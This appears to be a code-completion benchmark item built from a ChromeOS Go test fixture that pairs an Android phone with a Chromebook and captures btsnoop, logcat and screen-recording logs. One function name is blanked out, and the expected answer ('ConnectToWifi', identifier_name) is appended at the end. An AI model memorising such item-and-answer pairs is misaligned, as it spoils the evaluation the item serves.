		if s.HasError() {
			if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
				s.Log("Failed to save Android bug report: ", err)
			}
		}
	}()
	// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
	btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
	if err := btsnoopCmd.Start(); err != nil {
		s.Fatal("Failed to start btsnoop logging: ", err)
	}
	// Deferred calls run LIFO: Kill the capture first, then Wait to reap it.
	defer btsnoopCmd.Wait()
	defer btsnoopCmd.Kill()
	// Enable bluetooth debug logging.
	levels := bluetooth.LogVerbosity{
		Bluez:  true,
		Kernel: true,
	}
	// BUG FIX: SetUp's return value is the fixture data handed to dependent
	// tests, not an error. The previous `return errors.Wrap(...)` would have
	// silently passed an error value as the fixture data instead of failing
	// setup; report the failure explicitly like every other path here.
	if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
		s.Fatal("Failed to enable bluetooth debug logging: ", err)
	}
	// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
	if !f.noSignIn {
		// Sometimes during login the tcp connection to the snippet server on Android is lost.
		// If the Pair RPC fails, reconnect to the snippet server and try again.
		if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
			s.Fatal("Pairing with Android failed: ", err)
		}
		if f.allFeatures {
			// Wait for the "Smart Lock is turned on" notification to appear,
			// since it will cause Phone Hub to close if it's open before the notification pops up.
			if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
				s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
			}
			if err := phonehub.Enable(ctx, tconn, cr); err != nil {
				s.Fatal("Failed to enable Phone Hub: ", err)
			}
			if err := phonehub.Hide(ctx, tconn); err != nil {
				s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
			}
			if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
				s.Fatal("Failed to enable Phone Hub notifications: ", err)
			}
		}
		if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
			s.Fatal("Did not receive notification that Chromebook and Phone are paired")
		}
	}
	// Store Android attributes for reporting.
	androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
	if err != nil {
		s.Fatal("Failed to get Android attributes for reporting: ", err)
	}
	f.androidAttributes = androidAttributes
	// Store CrOS test metadata for reporting.
	crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
	if err != nil {
		s.Fatal("Failed to get CrOS attributes for reporting: ", err)
	}
	f.crosAttributes = crosAttributes
	// Get the user's Download path for saving screen recordings.
	f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
	if err != nil {
		s.Fatal("Failed to get user's Downloads path: ", err)
	}
	// Lock chrome after all Setup is complete so we don't block other fixtures.
	if f.lockFixture {
		chrome.Lock()
	}
	return &FixtData{
		Chrome:        cr,
		TestConn:      tconn,
		AndroidDevice: androidDevice,
		Username:      crosUsername,
		Password:      crosPassword,
		ChromeOptions: opts,
	}
}
// TearDown releases the Chrome lock taken in SetUp (when this fixture locked
// it) and closes the Chrome session; the cached handle is always dropped.
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
	defer func() { f.cr = nil }()
	if !f.lockFixture {
		return
	}
	chrome.Unlock()
	if err := f.cr.Close(ctx); err != nil {
		s.Log("Failed to close Chrome connection: ", err)
	}
}
// Reset verifies the existing Chrome session is still usable between tests
// and clears its state; a non-nil return makes the framework recreate the fixture.
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
	err := f.cr.Responded(ctx)
	if err != nil {
		return errors.Wrap(err, "existing Chrome connection is unusable")
	}
	err = f.cr.ResetState(ctx)
	if err != nil {
		return errors.Wrap(err, "failed resetting existing Chrome session")
	}
	return nil
}
// PreTest starts per-test log capture before each test body runs: device
// attribute JSON, a btsnoop trace, a Chrome log marker, the logcat start
// timestamp, and (when enabled) CrOS and Android screen recordings.
// PostTest is responsible for stopping and saving all of these.
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
	if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
		s.Error("Failed to save device attributes: ", err)
	}
	// Use the test's own context so the btsnoop capture spans the whole test body.
	f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
	if err := f.btsnoopCmd.Start(); err != nil {
		s.Fatal("Failed to start btsnoop logging: ", err)
	}
	// A leftover marker means a previous PostTest didn't run to completion.
	if f.logMarker != nil {
		s.Log("A log marker is already created but not cleaned up")
	}
	// Mark the current end of the Chrome log so PostTest can save only this test's slice.
	logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
	if err == nil {
		f.logMarker = logMarker
	} else {
		s.Log("Failed to start the log saver: ", err)
	}
	// Remember where logcat currently ends; PostTest dumps from this point.
	timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
	if err != nil {
		s.Fatal("Failed to get latest logcat timestamp: ", err)
	}
	f.logcatStartTime = timestamp
	if f.saveScreenRecording {
		if f.kb == nil {
			// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
			kb, err := input.VirtualKeyboard(ctx)
			if err != nil {
				s.Fatal("Failed to setup keyboard for screen recording: ", err)
			}
			f.kb = kb
		}
		if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
			s.Fatal("Failed to start screen recording on CrOS: ", err)
		}
		// The returned closure saves the Android recording only on test error;
		// PostTest invokes and clears it.
		saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
		if err != nil {
			s.Fatal("Failed to start screen recording on Android: ", err)
		}
		f.saveAndroidScreenRecordingOnError = saveScreen
	}
}
// PostTest stops the per-test captures started in PreTest and saves their
// artifacts to the test's output directory: the btsnoop trace, the per-test
// slice of the Chrome log, logcat (regular and persistent), screen recordings
// when enabled, and an Android bug report if the test failed. It also restores
// the ADB-over-WiFi connection when a test dropped it.
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
	if err := f.btsnoopCmd.Kill(); err != nil {
		s.Error("Failed to stop btsnoop log capture: ", err)
	}
	// Reap the killed capture process; its exit error is expected and ignored.
	f.btsnoopCmd.Wait()
	f.btsnoopCmd = nil
	if f.logMarker != nil {
		if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
			s.Log("Failed to store per-test log data: ", err)
		}
		f.logMarker = nil
	}
	// Restore connection to the ADB-over-WiFi device if it was lost during the test.
	// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
	if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
		s.Log("Connection to ADB device lost, restarting")
		device, err := AdbOverWifi(ctx)
		if err != nil {
			s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
		}
		f.androidDevice.Device = device
		if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
			s.Fatal("Failed to reconnect to the snippet: ", err)
		}
	}
	if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
		s.Fatal("Failed to save logcat logs from the test: ", err)
	}
	if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
		s.Fatal("Failed to save persistent logcat logs: ", err)
	}
	if f.saveScreenRecording {
		if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
			s.Fatal("Failed to save Android screen recording: ", err)
		}
		f.saveAndroidScreenRecordingOnError = nil
		ui := uiauto.New(f.tconn)
		var crosRecordErr error
		if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil {
			// Smart Lock tests automatically stop the screen recording when they lock the screen.
			// The screen recording should still exist though.
			crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
		} else {
			crosRecordErr = uiauto.StopRecordFromKBAndSaveOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
		}
		if crosRecordErr != nil {
			s.Fatal("Failed to save CrOS screen recording: ", crosRecordErr)
		}
	}
	// Capture an Android bug report whenever the test body reported an error.
	if s.HasError() {
		if err := BugReport(ctx, f.androidDevice.Device, s.OutDir()); err != nil {
			s.Error("Failed to save Android bug report: ", err)
		}
	}
}
// PairWithAndroid verifies that pairing between the Android phone and the
// Chromebook succeeds, retrying the Pair RPC once after reconnecting to the
// snippet server (the TCP connection to it is sometimes lost during login),
// then waits for the paired device to appear in OS settings.
func (f *crossdeviceFixture) PairWithAndroid(ctx context.Context, tconn *chrome.TestConn, cr *chrome.Chrome) error {
	if err := f.androidDevice.Pair(ctx); err != nil {
		// First attempt failed; re-establish the snippet connection and retry once.
		if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
			return errors.Wrap(err, "failed to reconnect to the snippet server")
		}
		if err := f.androidDevice.Pair(ctx); err != nil {
			return errors.Wrap(err, "failed to connect the Android device to CrOS")
		}
	}
	if err := crossdevicesettings.WaitForConnectedDevice(ctx, tconn, cr); err != nil {
		return errors.Wrap(err, "failed waiting for the connected device to appear in OS settings")
	}
	return nil
}
// saveDeviceAttributes saves the CrOS and Android device attributes as a
// formatted JSON document at outputPath (mode 0644).
// The parameter was renamed from `filepath` because that name shadows the
// path/filepath package used throughout this file.
func saveDeviceAttributes(crosAttrs *crossdevicecommon.CrosAttributes, androidAttrs *AndroidAttributes, outputPath string) error {
	// Bundle both devices' attributes into one object for a single JSON file.
	attributes := struct {
		CrOS    *crossdevicecommon.CrosAttributes
		Android *AndroidAttributes
	}{CrOS: crosAttrs, Android: androidAttrs}
	crosLog, err := json.MarshalIndent(attributes, "", "\t")
	if err != nil {
		return errors.Wrap(err, "failed to format device metadata for logging")
	}
	if err := ioutil.WriteFile(outputPath, crosLog, 0644); err != nil {
		return errors.Wrap(err, "failed to write CrOS attributes to output file")
	}
	return nil
}
// ConnectToWifi connects the chromebook to the Wifi network in its RF box.
func | (ctx context.Context) error {
if err := testing.Poll(ctx, func(ctx context.Context) error {
out, err := testexec.CommandContext(ctx, "/usr/local/autotest/cros/scripts/wifi", "connect", "nearbysharing_1", "password").CombinedOutput(testexec.DumpLogOnError)
if err != nil {
if strings.Contains(string(out), "already connected") {
testing.ContextLog(ctx, "Already connected to wifi network")
return nil
}
return errors.Wrap(err, "failed to connect CrOS device to Wifi")
}
return nil
}, &testing.PollOptions{Timeout: 20 * time.Second, Interval: 3 * time.Second}); err != nil {
return errors.Wrap(err, "failed to connect to wifi")
}
return nil
}
| ConnectToWifi | identifier_name |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.